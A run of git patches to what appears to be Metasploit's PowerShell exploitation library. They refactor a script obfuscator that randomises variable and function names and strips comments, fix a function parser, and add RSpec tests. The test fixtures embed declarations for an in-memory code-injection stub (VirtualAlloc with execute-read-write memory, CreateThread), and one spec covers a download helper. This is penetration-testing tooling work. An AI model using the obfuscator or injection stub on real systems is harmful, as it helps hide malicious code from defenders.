+      expect { subject.decompress_code }.to raise_error(RuntimeError)
+      subject.code.should eq corrupted
+    end
+  end
+end
+

From 6ab85027a4b3e25bf88068293298dc00c54f723d Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 5 May 2014 17:47:30 +0100
Subject: [PATCH 114/321] More spec

---
 lib/rex/exploitation/powershell/obfu.rb       |  24 ++-
 lib/rex/exploitation/powershell/parser.rb     |  59 +++++--
 lib/rex/exploitation/powershell/script.rb     |   5 +-
 .../rex/exploitation/powershell/obfu_spec.rb  | 127 ++++++++++++++
 .../exploitation/powershell/parser_spec.rb    | 159 ++++++++++++++++++
 5 files changed, 353 insertions(+), 21 deletions(-)
 create mode 100644 spec/lib/rex/exploitation/powershell/obfu_spec.rb
 create mode 100644 spec/lib/rex/exploitation/powershell/parser_spec.rb

diff --git a/lib/rex/exploitation/powershell/obfu.rb b/lib/rex/exploitation/powershell/obfu.rb
index 2a1d364884..18a7b241e7 100644
--- a/lib/rex/exploitation/powershell/obfu.rb
+++ b/lib/rex/exploitation/powershell/obfu.rb
@@ -1,6 +1,5 @@
 # -*- coding: binary -*-
 
-require 'zlib'
 require 'rex/text'
 
 module Rex
@@ -13,21 +12,23 @@ module Powershell
     #
     # Create hash of string substitutions
     #
+    # @param strings [Array] array of strings to generate unique names
+    #
+    # @return [Hash] map of strings with new unique names
     def sub_map_generate(strings)
       map = {}
       strings.flatten.each do |str|
-        map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
-        # Ensure our variables are unique
-        while not map.values.uniq == map.values
-          map[str] = "$#{Rex::Text.rand_text_alpha(rand(2)+2)}"
-        end
+        @rig.init_var(str)
+        map[str] = @rig[str]
       end
-      return map
+
+      map
     end
 
     #
     # Remove comments
     #
+    # @return [String] code without comments
     def strip_comments
       # Multi line
       code.gsub!(/<#(.*?)#>/m,'')
@@ -38,6 +39,7 @@ module Powershell
     #
     # Remove empty lines
     #
+    # @return [String] code without empty lines
     def strip_empty_lines
       # Windows EOL
       code.gsub!(/[\r\n]+/,"\r\n")
@@ -49,6 +51,7 @@ module Powershell
     # Remove whitespace
     # This can break some codes using inline .NET
     #
+    # @return [String] code with whitespace stripped
     def strip_whitespace
       code.gsub!(/\s+/,' ')
     end
@@ -56,6 +59,7 @@ module Powershell
     #
     # Identify variables and replace them
     #
+    # @return [String] code with variable names replaced with unique values
     def sub_vars
       # Get list of variables, remove reserved
       vars = get_var_names
@@ -68,6 +72,8 @@ module Powershell
     #
     # Identify function names and replace them
     #
+    # @return [String] code with function names replaced with unique
+    #   values
     def sub_funcs
       # Find out function names, make map
       # Sub map keys for values
@@ -79,6 +85,7 @@ module Powershell
     #
     # Perform standard substitutions
     #
+    # @return [String] code with standard substitution methods applied
     def standard_subs(subs = %w{strip_comments strip_whitespace sub_funcs sub_vars} )
       # Save us the trouble of breaking injected .NET and such
       subs.delete('strip_whitespace') unless string_literals.empty?
@@ -87,7 +94,8 @@ module Powershell
         self.send(modifier)
       end
       code.gsub!(/^$|^\s+$/,'')
-      return code
+
+      code
     end
 
   end # Obfu
diff --git a/lib/rex/exploitation/powershell/parser.rb b/lib/rex/exploitation/powershell/parser.rb
index fc25aa404c..7564d56082 100644
--- a/lib/rex/exploitation/powershell/parser.rb
+++ b/lib/rex/exploitation/powershell/parser.rb
@@ -1,8 +1,5 @@
 # -*- coding: binary -*-
 
-require 'zlib'
-require 'rex/text'
-
 module Rex
 module Exploitation
 
@@ -69,26 +66,35 @@ module Powershell
     #
     # Get variable names from code, removes reserved names from return
     #
+    # @return [Array] variable names
     def get_var_names
-      our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
-      return our_vars.select {|v| !RESERVED_VARIABLE_NAMES.include?(v.downcase)}
+      our_vars = code.scan(/\$[a-zA-Z\-\_0-9]+/).uniq.flatten.map(&:strip)
+      our_vars.select {|v| !RESERVED_VARIABLE_NAMES.include?(v.downcase)}
     end
 
     #
     # Get function names from code
     #
+    # @return [Array] function names
     def get_func_names
-      return code.scan(/function\s([a-zA-Z\-\_]+)/).uniq.flatten
+      code.scan(/function\s([a-zA-Z\-\_0-9]+)/).uniq.flatten
     end
 
+    #
     # Attempt to find string literals in PSH expression
+    #
+    # @return [Array] string literals
     def get_string_literals
-      code.scan(/@"(.*)"@|@'(.*)'@/)
+      code.scan(/@"(.+?)"@|@'(.+?)'@/m)
     end
 
     #
     # Scan code and return matches with index
     #
+    # @param str [String] string to match in code
+    # @param source [String] source code to match, defaults to @code
+    #
+    # @return [Array[String,Integer]] matched items with index
     def scan_with_index(str,source=code)
       ::Enumerator.new do |y|
         source.scan(str) do
@@ -100,6 +106,9 @@ module Powershell
     #
     # Return matching bracket type
     #
+    # @param char [String] opening bracket character
+    #
+    # @return [String] matching closing bracket
     def match_start(char)
       case char
       when '{'
@@ -110,6 +119,8 @@ module Powershell
         ']'
       when '<'
         '>'
+      else
+        raise ArgumentError, "Unknown starting bracket"
       end
     end
 
@@ -120,7 +131,16 @@ module Powershell
     # Once the balanced matching bracket is found, all script content
     # between idx and the index of the matching bracket is returned
     #
+    # @param idx [Integer] index of opening bracket
+    #
+    # @return [String] content between matching brackets
     def block_extract(idx)
+      raise ArgumentError unless idx
+
+      if idx < 0 || idx >= code.length
+          raise ArgumentError, "Invalid index"
+      end
+
       start = code[idx]
       stop = match_start(start)
       delims = scan_with_index(/#{Regexp.escape(start)}|#{Regexp.escape(stop)}/,code[idx+1..-1])
@@ -128,19 +148,36 @@ module Powershell
       c = 1
       sidx = nil
       # Go through delims till we balance, get idx
-      while not c == 0 and x = delims.shift do
+      while ((c != 0) && (x = delims.shift)) do
         sidx = x[1]
         x[0] == stop ? c -=1 : c+=1
       end
-      return code[idx..sidx]
+
+      code[idx..sidx]
     end
 
+    #
+    # Extract a block of function code
+    #
+    # @param func_name [String] function name
+    # @param delete [Boolean] delete the function from the code
+    #
+    # @return [String] function block
     def get_func(func_name, delete = false)
       start = code.index(func_name)
+
+      return nil unless start
+
       idx = code[start..-1].index('{') + start
       func_txt = block_extract(idx)
-      code.delete(ftxt) if delete
-      return Function.new(func_name,func_txt)
+
+      if delete
+        delete_code = code[0..idx]
+        delete_code << code[(idx+func_txt.length)..-1]
+        @code = delete_code
+      end
+
+      Function.new(func_name,func_txt)
     end
   end # Parser
 
diff --git a/lib/rex/exploitation/powershell/script.rb b/lib/rex/exploitation/powershell/script.rb
index 9331f19fde..b60c667abc 100644
--- a/lib/rex/exploitation/powershell/script.rb
+++ b/lib/rex/exploitation/powershell/script.rb
@@ -1,7 +1,6 @@
 # -*- coding: binary -*-
 
-require 'zlib'
-require 'rex/text'
+require 'rex'
 
 module Rex
 module Exploitation
@@ -36,6 +35,8 @@ module Powershell
 
     def initialize(code)
       @code = ''
+      @rig = Rex::RandomIdentifierGenerator.new()
+
       begin
         # Open code file for reading
         fd = ::File.new(code, 'rb')
diff --git a/spec/lib/rex/exploitation/powershell/obfu_spec.rb b/spec/lib/rex/exploitation/powershell/obfu_spec.rb
new file mode 100644
index 0000000000..7dded636d8
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/obfu_spec.rb
@@ -0,0 +1,127 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Obfu do
+
+  let(:example_script_without_literal) do
+"""
+function Find-4624Logons
+{
+
+   if (-not ($NewLogonAccountDomain -cmatch \"NT\\sAUTHORITY\" -or $NewLogonAccountDomain -cmatch \"Window\\sManager\"))
+        {
+            $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort
+            if (-not $ReturnInfo.ContainsKey($Key))
+            {
+                $Properties = @{
+                    LogType = 4624
+                    LogSource = \"Security\"
+                    SourceAccountName = $AccountName
+                    SourceDomainName = $AccountDomain
+                    NewLogonAccountName = $NewLogonAccountName
+                    NewLogonAccountDomain = $NewLogonAccountDomain
+                    LogonType = $LogonType
+                    WorkstationName = $WorkstationName
+                    SourceNetworkAddress = $SourceNetworkAddress
+                    SourcePort = $SourcePort
+                    Count = 1
+                    Times = @($Logon.TimeGenerated)
+                }
+
+                $ResultObj = New-Object PSObject -Property $Properties
+                $ReturnInfo.Add($Key, $ResultObj)
+            }
+            else
+            {
+                $ReturnInfo[$Key].Count++
+                $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated
+            }
+        }
+    }
+}"""
+
+  end
+
+  let(:example_script) do
+"""
+function Find-4624Logons
+{
+    $some_literal = @\"
+  using System;
+  using System.Runtime.InteropServices;
+  namespace $kernel32 {
+    public class func {
+      [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+      [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+      [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+      [DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+      [DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+      [DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+    }
+  }
+\"@
+   if (-not ($NewLogonAccountDomain -cmatch \"NT\\sAUTHORITY\" -or $NewLogonAccountDomain -cmatch \"Window\\sManager\"))
+        {
+            $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort
+            if (-not $ReturnInfo.ContainsKey($Key))
+            {
+                $Properties = @{
+                    LogType = 4624
+                    LogSource = \"Security\"
+                    SourceAccountName = $AccountName
+                    SourceDomainName = $AccountDomain
+                    NewLogonAccountName = $NewLogonAccountName
+                    NewLogonAccountDomain = $NewLogonAccountDomain
+                    LogonType = $LogonType
+                    WorkstationName = $WorkstationName
+                    SourceNetworkAddress = $SourceNetworkAddress
+                    SourcePort = $SourcePort
+                    Count = 1
+                    Times = @($Logon.TimeGenerated)
+                }
+                $literal2 = @\"parp\"@
+                $ResultObj = New-Object PSObject -Property $Properties
+                $ReturnInfo.Add($Key, $ResultObj)
+            }
+            else
+            {
+                $ReturnInfo[$Key].Count++
+                $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated
+            }
+        }
+    }
+}"""
+
+  end
+
+  let(:subject) do
+    Rex::Exploitation::Powershell::Script.new(example_script)
+  end
+
+  let(:subject_no_literal) do
+    Rex::Exploitation::Powershell::Script.new(example_script_without_literal)
+  end
+
+  describe "::sub_map_generate" do
+    it 'should return some unique variable names' do
+      map = subject.sub_map_generate(['blah','parp'])
+      map.should be
+      map.should be_kind_of Hash
+      map.empty?.should be_false
+      map.should eq map.uniq
+    end
+
+    it 'should not match upper or lowercase reserved names' do
+      initial_vars = subject.get_var_names
+      subject.code << "\r\n$SHELLID"
+      subject.code << "\r\n$ShellId"
+      subject.code << "\r\n$shellid"
+      after_vars = subject.get_var_names
+      initial_vars.should eq after_vars
+    end
+  end
+
+end
+
diff --git a/spec/lib/rex/exploitation/powershell/parser_spec.rb b/spec/lib/rex/exploitation/powershell/parser_spec.rb
new file mode 100644
index 0000000000..5705c63679
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/parser_spec.rb
@@ -0,0 +1,159 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Parser do
+
+  let(:example_script) do
+"""
+function Find-4624Logons
+{
+    $some_literal = @\"
+  using System;
+  using System.Runtime.InteropServices;
+  namespace $kernel32 {
+    public class func {
+      [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
+      [Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
+      [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
+      [DllImport(\"kernel32.dll\")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
+      [DllImport(\"kernel32.dll\")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
+      [DllImport(\"kernel32.dll\")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
+    }
+  }
+\"@
+   if (-not ($NewLogonAccountDomain -cmatch \"NT\\sAUTHORITY\" -or $NewLogonAccountDomain -cmatch \"Window\\sManager\"))
+        {
+            $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort
+            if (-not $ReturnInfo.ContainsKey($Key))
+            {
+                $Properties = @{
+                    LogType = 4624
+                    LogSource = \"Security\"
+                    SourceAccountName = $AccountName
+                    SourceDomainName = $AccountDomain
+                    NewLogonAccountName = $NewLogonAccountName
+                    NewLogonAccountDomain = $NewLogonAccountDomain
+                    LogonType = $LogonType
+                    WorkstationName = $WorkstationName
+                    SourceNetworkAddress = $SourceNetworkAddress
+                    SourcePort = $SourcePort
+                    Count = 1
+                    Times = @($Logon.TimeGenerated)
+                }
+                $literal2 = @\"parp\"@
+                $ResultObj = New-Object PSObject -Property $Properties
+                $ReturnInfo.Add($Key, $ResultObj)
+            }
+            else
+            {
+                $ReturnInfo[$Key].Count++
+                $ReturnInfo[$Key].Times += ,$Logon.TimeGenerated
+            }
+        }
+    }
+}"""
+
+  end
+
+  let(:subject) do
+    Rex::Exploitation::Powershell::Script.new(example_script)
+  end
+
+  describe "::get_var_names" do
+    it 'should return some variable names' do
+      vars = subject.get_var_names
+      vars.should be
+      vars.should be_kind_of Array
+      vars.length.should be > 0
+      vars.include?('$ResultObj').should be_true
+    end
+
+    it 'should not match upper or lowercase reserved names' do
+      initial_vars = subject.get_var_names
+      subject.code << "\r\n$SHELLID"
+      subject.code << "\r\n$ShellId"
+      subject.code << "\r\n$shellid"
+      after_vars = subject.get_var_names
+      initial_vars.should eq after_vars
+    end
+  end
+
+  describe "::get_func_names" do
+    it 'should return some function names' do
+      funcs = subject.get_func_names
+      funcs.should be
+      funcs.should be_kind_of Array
+      funcs.length.should be > 0
+      funcs.include?('Find-4624Logons').should be_true
+    end
+  end
+
+  describe "::get_string_literals" do
+    it 'should return some string literals' do
+      literals = subject.get_string_literals
+      literals.should be
+      literals.should be_kind_of Array
+      literals.length.should be > 0
+      literals[0].include?('parp').should be_false
+    end
+  end
+
+  describe "::scan_with_index" do
+    it 'should scan code and return the items with an index' do
+      scan = subject.scan_with_index('DllImport')
+      scan.should be
+      scan.should be_kind_of Array
+      scan.length.should be > 0
+      scan[0].should be_kind_of Array
+      scan[0][0].should be_kind_of String
+      scan[0][1].should be_kind_of Integer
+    end
+  end
+
+  describe "::match_start" do
+    it 'should match the correct brackets' do
+      subject.match_start('{').should eq '}'
+      subject.match_start('(').should eq ')'
+      subject.match_start('[').should eq ']'
+      subject.match_start('<').should eq '>'
+      expect { subject.match_start('p') }.to raise_exception(ArgumentError)
+    end
+  end
+
+  describe "::block_extract" do
+    it 'should extract a block between brackets given an index' do
+      idx = subject.code.index('{')
+      block = subject.block_extract(idx)
+      block.should be
+      block.should be_kind_of String
+    end
+
+    it 'should raise a runtime error if given an invalid index' do
+      expect { subject.block_extract(nil) }.to raise_error(ArgumentError)
+      expect { subject.block_extract(-1) }.to raise_error(ArgumentError)
+      expect { subject.block_extract(subject.code.length) }.to raise_error(ArgumentError)
+      expect { subject.block_extract(59) }.to raise_error(ArgumentError)
+    end
+  end
+
+  describe "::get_func" do
+    it 'should extract a function from the code' do
+      function = subject.get_func('Find-4624Logons')
+      function.should be
+      function.should be_kind_of Rex::Exploitation::Powershell::Function
+    end
+
+    it 'should return nil if function doesnt exist' do
+      function = subject.get_func(Rex::Text.rand_text_alpha(5))
+      function.should be_nil
+    end
+
+    it 'should delete the function if delete is true' do
+      function = subject.get_func('Find-4624Logons', true)
+      subject.code.include?('DllImport').should be_false
+    end
+  end
+end
+

From 0177e511480894e9e4ab863a9593406ea60c1d1c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 5 May 2014 18:38:48 +0100
Subject: [PATCH 115/321] Finish obfu specs and use rig

---
 lib/rex/exploitation/powershell/obfu.rb       |  39 ++---
 .../rex/exploitation/powershell/obfu_spec.rb  | 133 ++++++++++++++++--
 2 files changed, 134 insertions(+), 38 deletions(-)

diff --git a/lib/rex/exploitation/powershell/obfu.rb b/lib/rex/exploitation/powershell/obfu.rb
index 18a7b241e7..1476432256 100644
--- a/lib/rex/exploitation/powershell/obfu.rb
+++ b/lib/rex/exploitation/powershell/obfu.rb
@@ -9,22 +9,6 @@ module Powershell
 
   module Obfu
 
-    #
-    # Create hash of string substitutions
-    #
-    # @param strings [Array] array of strings to generate unique names
-    #
-    # @return [Hash] map of strings with new unique names
-    def sub_map_generate(strings)
-      map = {}
-      strings.flatten.each do |str|
-        @rig.init_var(str)
-        map[str] = @rig[str]
-      end
-
-      map
-    end
-
     #
     # Remove comments
     #
@@ -34,6 +18,8 @@ module Powershell
       code.gsub!(/<#(.*?)#>/m,'')
       # Single line
       code.gsub!(/^\s*#(?!.*region)(.*$)/i,'')
+
+      code
     end
 
     #
@@ -45,6 +31,8 @@ module Powershell
       code.gsub!(/[\r\n]+/,"\r\n")
       # UNIX EOL
       code.gsub!(/[\n]+/,"\n")
+
+      code
     end
 
     #
@@ -54,6 +42,8 @@ module Powershell
     # @return [String] code with whitespace stripped
     def strip_whitespace
       code.gsub!(/\s+/,' ')
+
+      code
     end
 
     #
@@ -62,11 +52,11 @@ module Powershell
     # @return [String] code with variable names replaced with unique values
     def sub_vars
       # Get list of variables, remove reserved
-      vars = get_var_names
-      # Create map, sub key for val
-      sub_map_generate(vars).each do |var,sub|
-        code.gsub!(var,sub)
+      get_var_names.each do |var,sub|
+        code.gsub!(var, "$#{@rig.init_var(var)}")
       end
+
+      code
     end
 
     #
@@ -76,10 +66,11 @@ module Powershell
     #   values
     def sub_funcs
       # Find out function names, make map
-      # Sub map keys for values
-      sub_map_generate(get_func_names).each do |var,sub|
-        code.gsub!(var,sub)
+      get_func_names.each do |var, sub|
+        code.gsub!(var, @rig.init_var(var))
       end
+
+      code
     end
 
     #
@@ -88,7 +79,7 @@ module Powershell
     # @return [String] code with standard substitution methods applied
     def standard_subs(subs = %w{strip_comments strip_whitespace sub_funcs sub_vars} )
       # Save us the trouble of breaking injected .NET and such
-      subs.delete('strip_whitespace') unless string_literals.empty?
+      subs.delete('strip_whitespace') unless get_string_literals.empty?
       # Run selected modifiers
       subs.each do |modifier|
         self.send(modifier)
diff --git a/spec/lib/rex/exploitation/powershell/obfu_spec.rb b/spec/lib/rex/exploitation/powershell/obfu_spec.rb
index 7dded636d8..39c83ed7bd 100644
--- a/spec/lib/rex/exploitation/powershell/obfu_spec.rb
+++ b/spec/lib/rex/exploitation/powershell/obfu_spec.rb
@@ -10,6 +10,24 @@ describe Rex::Exploitation::Powershell::Obfu do
 function Find-4624Logons
 {
 
+<#
+
+multiline_comment
+
+#>
+\r\n\r\n\r\n
+\r\n
+
+lots \t of   whitespace
+
+\n\n\n\n\n
+\n\n
+
+
+# single_line_comment1
+    # single_line_comment2
+    #
+    # single_line_comment3    
    if (-not ($NewLogonAccountDomain -cmatch \"NT\\sAUTHORITY\" -or $NewLogonAccountDomain -cmatch \"Window\\sManager\"))
         {
             $Key = $AccountName + $AccountDomain + $NewLogonAccountName + $NewLogonAccountDomain + $LogonType + $WorkstationName + $SourceNetworkAddress + $SourcePort
@@ -48,6 +66,25 @@ function Find-4624Logons
 """
 function Find-4624Logons
 {
+
+<#
+
+multiline_comment
+
+#>
+\r\n\r\n\r\n
+\r\n
+
+lots \t of   whitespace
+
+\n\n\n\n\n
+\n\n
+
+
+# single_line_comment1
+    # single_line_comment2
+    #
+    # single_line_comment3    
     $some_literal = @\"
   using System;
   using System.Runtime.InteropServices;
@@ -104,24 +141,92 @@ function Find-4624Logons
     Rex::Exploitation::Powershell::Script.new(example_script_without_literal)
   end
 
-  describe "::sub_map_generate" do
-    it 'should return some unique variable names' do
-      map = subject.sub_map_generate(['blah','parp'])
-      map.should be
-      map.should be_kind_of Hash
-      map.empty?.should be_false
-      map.should eq map.uniq
+  describe "::strip_comments" do
+    it 'should strip a multiline comment' do
+      subject.strip_comments
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('comment').should be_false
     end
 
-    it 'should not match upper or lowercase reserved names' do
-      initial_vars = subject.get_var_names
-      subject.code << "\r\n$SHELLID"
-      subject.code << "\r\n$ShellId"
-      subject.code << "\r\n$shellid"
-      after_vars = subject.get_var_names
-      initial_vars.should eq after_vars
+    it 'should strip a single line comment' do
+      subject.strip_comments
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('#').should be_false
     end
   end
 
+  describe "::strip_empty_lines" do
+    it 'should strip extra windows new lines' do
+      subject.strip_empty_lines
+      subject.code.should be
+      subject.code.should be_kind_of String
+      res = (subject.code =~ /\r\n\r\n/)
+      res.should be_false
+    end
+
+    it 'should strip extra unix new lines' do
+      subject.strip_empty_lines
+      subject.code.should be
+      subject.code.should be_kind_of String
+      res = (subject.code =~ /\n\n/)
+      res.should be_false
+    end
+  end
+
+  describe "::strip_whitespace" do
+    it 'should strip additional whitespace' do
+      subject.strip_whitespace
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('lots of whitespace').should be_true
+    end
+  end
+
+  describe "::sub_vars" do
+    it 'should replace variables with unique names' do
+      subject.sub_vars
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('$kernel32').should be_false
+      subject.code.include?('$Logon').should be_false
+    end
+  end
+
+  describe "::sub_funcs" do
+    it 'should replace functions with unique names' do
+      subject.sub_funcs
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('Find-4624Logons').should be_false
+    end
+  end
+
+  describe "::standard_subs" do
+    it 'should run all substitutions on a script with no literals' do
+      subject_no_literal.standard_subs
+      subject_no_literal.code.should be
+      subject_no_literal.code.should be_kind_of String
+      subject_no_literal.code.include?('Find-4624Logons').should be_false
+      subject_no_literal.code.include?('lots of whitespace').should be_true
+      subject_no_literal.code.include?('$kernel32').should be_false
+      subject_no_literal.code.include?('comment').should be_false
+      res = (subject_no_literal.code =~ /\r\n\r\n/)
+      res.should be_false
+    end
+
+    it 'should run all substitutions except strip whitespace when literals are present' do
+      subject.standard_subs
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.include?('Find-4624Logons').should be_false
+      subject.code.include?('lots of whitespace').should be_false
+      subject.code.include?('$kernel32').should be_false
+      subject.code.include?('comment').should be_false
+      res = (subject.code =~ /\r\n\r\n/)
+      res.should be_false
+    end
+  end
 end
 

From 0b886db406bbdce92bf33924f1f1c5005eeb9d2f Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 5 May 2014 19:01:36 +0100
Subject: [PATCH 116/321] Script specs and remove unknown method

---
 lib/rex/exploitation/powershell/script.rb     | 12 +----
 .../exploitation/powershell/script_spec.rb    | 48 +++++++++++++++++++
 2 files changed, 49 insertions(+), 11 deletions(-)
 create mode 100644 spec/lib/rex/exploitation/powershell/script_spec.rb

diff --git a/lib/rex/exploitation/powershell/script.rb b/lib/rex/exploitation/powershell/script.rb
index b60c667abc..3b3643dfd4 100644
--- a/lib/rex/exploitation/powershell/script.rb
+++ b/lib/rex/exploitation/powershell/script.rb
@@ -9,7 +9,7 @@ module Powershell
 
   class Script
     attr_accessor :code
-    attr_reader :functions
+    attr_reader :functions, :rig
 
     include Output
     include Parser
@@ -88,16 +88,6 @@ module Powershell
       return psh << lines.join("") + "\r\n"
     end
 
-    #
-    # ?? RageLtMan
-    #
-    # @param dir [String] ?
-    def self.psp_funcs(dir)
-      scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
-      functions = scripts.map {|s| Script.new(s).functions}
-      return functions.flatten
-    end
-
     #
     # Return list of code modifier methods
     #
diff --git a/spec/lib/rex/exploitation/powershell/script_spec.rb b/spec/lib/rex/exploitation/powershell/script_spec.rb
new file mode 100644
index 0000000000..7b7b849606
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/script_spec.rb
@@ -0,0 +1,48 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::Output do
+
+  let(:example_script) do
+    Rex::Text.rand_text_alpha(400)
+  end
+
+  let(:subject) do
+    Rex::Exploitation::Powershell::Script.new(example_script)
+  end
+
+  describe "::initialize" do
+    it 'should create a new script object' do
+      subject.should be
+      subject.should be_kind_of Rex::Exploitation::Powershell::Script
+      subject.rig.should be
+      subject.rig.should be_kind_of Rex::RandomIdentifierGenerator
+      subject.code.should be
+      subject.code.should be_kind_of String
+      subject.code.empty?.should be_false
+      subject.functions.empty?.should be_true
+    end
+  end
+
+  describe "::to_byte_array" do
+    it 'should generate a powershell byte array' do
+      byte_array = Rex::Exploitation::Powershell::Script.to_byte_array("parp")
+      byte_array.should be
+      byte_array.should be_kind_of String
+      byte_array.include?('[Byte[]] $').should be_true
+    end
+  end
+
+  describe "::code_modifiers" do
+    it 'should return an array of modifier methods' do
+      mods = Rex::Exploitation::Powershell::Script.code_modifiers
+      mods.should be
+      mods.should be_kind_of Array
+      mods.empty?.should be_false
+    end
+  end
+
+end
+

From e946046de5bb604152f6e8c084c1686da4f5f3fa Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 5 May 2014 19:08:18 +0100
Subject: [PATCH 117/321] Add methods spec

---
 .../powershell/psh_methods_spec.rb            | 44 +++++++++++++++++++
 1 file changed, 44 insertions(+)
 create mode 100644 spec/lib/rex/exploitation/powershell/psh_methods_spec.rb

diff --git a/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb b/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb
new file mode 100644
index 0000000000..a1c85cfac6
--- /dev/null
+++ b/spec/lib/rex/exploitation/powershell/psh_methods_spec.rb
@@ -0,0 +1,44 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/powershell'
+
+describe Rex::Exploitation::Powershell::PshMethods do
+
+  describe "::download" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.download('a')
+      script.should be
+      script.include?('WebClient').should be_true
+    end
+  end
+  describe "::uninstall" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.uninstall('a')
+      script.should be
+      script.include?('Win32_Product').should be_true
+    end
+  end
+  describe "::secure_string" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.secure_string('a')
+      script.should be
+      script.include?('AsPlainText').should be_true
+    end
+  end
+  describe "::who_locked_file?" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.who_locked_file?('a')
+      script.should be
+      script.include?('Get-Process').should be_true
+    end
+  end
+  describe "::get_last_login" do
+    it 'should return some powershell' do
+      script = Rex::Exploitation::Powershell::PshMethods.get_last_login('a')
+      script.should be
+      script.include?('Get-QADComputer').should be_true
+    end
+  end
+end
+

From dc382127414190c8ffbc4a173145dc307356252b Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Mon, 5 May 2014 20:53:36 +0100
Subject: [PATCH 118/321] Fix function parsing

---
 lib/rex/exploitation/powershell/function.rb   | 24 +++++++++++++++----
 lib/rex/exploitation/powershell/param.rb      |  2 +-
 .../exploitation/powershell/function_spec.rb  | 13 ++++++++--
 3 files changed, 31 insertions(+), 8 deletions(-)

diff --git a/lib/rex/exploitation/powershell/function.rb b/lib/rex/exploitation/powershell/function.rb
index 8468380bd0..76fcf5d86e 100644
--- a/lib/rex/exploitation/powershell/function.rb
+++ b/lib/rex/exploitation/powershell/function.rb
@@ -37,12 +37,26 @@ module Powershell
       # Get start of our block
       idx = scan_with_index('(',code[start..-1]).first.last + start
       pclause = block_extract(idx)
-      # Keep lines which declare a variable of some class
-      vars = pclause.split(/\n|;/).select {|e| e =~ /\]\$\w/}
-      vars.map! {|v| v.split('=',2).first}.map(&:strip)
+
+      func_regex = /\[(\w+\[\])\]\$(\w+)\s?=|\[(\w+)\]\$(\w+)\s?=|\[(\w+\[\])\]\s+?\$(\w+)\s+=|\[(\w+)\]\s+\$(\w+)\s?=/i
+      #func_regex = /\[(\w+\[\])\]\.?\$(\w+)\s?=|\[(\w+)\]\s?\$(\w+)\s?=/i
+      matches = pclause.scan(func_regex)
+
       # Ignore assignment, create params with class and variable names
-      vars.map {|e| e.split('$')}.each do |klass,name|
-        @params << Param.new(klass,name)
+      matches.each do |param|
+        klass = nil
+        name = nil
+        param.each do |value|
+          if value
+            if klass
+              name = value
+              @params << Param.new(klass,name)
+              break
+            else
+              klass = value
+            end
+          end
+        end
       end
     end
   end
diff --git a/lib/rex/exploitation/powershell/param.rb b/lib/rex/exploitation/powershell/param.rb
index 652f0af1ec..27815e9e1f 100644
--- a/lib/rex/exploitation/powershell/param.rb
+++ b/lib/rex/exploitation/powershell/param.rb
@@ -8,7 +8,7 @@ module Powershell
   class Param
     attr_accessor :klass, :name
     def initialize(klass,name)
-      @klass = klass.strip.gsub(/\[|\]|\s/,'')
+      @klass = klass.strip
       @name = name.strip.gsub(/\s|,/,'')
